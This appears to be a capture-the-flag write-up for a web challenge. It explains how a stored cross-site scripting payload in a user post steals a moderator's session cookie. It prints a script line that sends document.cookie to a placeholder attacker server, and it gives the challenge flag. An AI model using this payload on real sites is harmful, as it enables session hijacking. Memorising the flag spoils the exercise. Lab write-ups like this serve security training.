write-ups-challenges-2021-2022/moderated/SOLUTION.md

39 lines
1.5 KiB
Markdown
Raw Permalink Normal View History

2021-12-02 23:33:26 +00:00
## Difficulty
Difficult
90 punten
## How to solve
The challenge consists of small web application where you can register and login.
First you will need to register for a new account, as you don't know any account
credentials yet. After doing so you will be redirected to the login page
where you can use those credentials to log in.
After loggin in, you will be presented with a page that lists your posts. At first,
this page will be empty, but new posts can be created using the "Create post" link.
To solve the challenge, you will need to create a posts that contains Javascript,
for example like this:
```
<script>
window.top.location = "http://SOME_IP:SOME_PORT/?q="+document.cookie;
</script>
```
You will see that when you view an individual post, this HTML gets rendered
and will be executed on the client side of whomever is viewing the page.
As each post needs to be reviewed by a moderator, we hope that the page
gets viewed by a moderator, and that the Javascript gets executed, therefore
stealing the cookie details of the moderator.
For this to work, you will need an external server that is accesible from
the internet on `SOME_IP:SOME_PORT` and logs all of the request information
so that you can view it. At some point, the moderator will log in and
view your post containing the malicious Javascript, at this point, the
cookie is leaked and can be replaced in your on browser (through the developer tools for example).
## Flag
IGCTF{BigTechWillnOtSiLenceUs}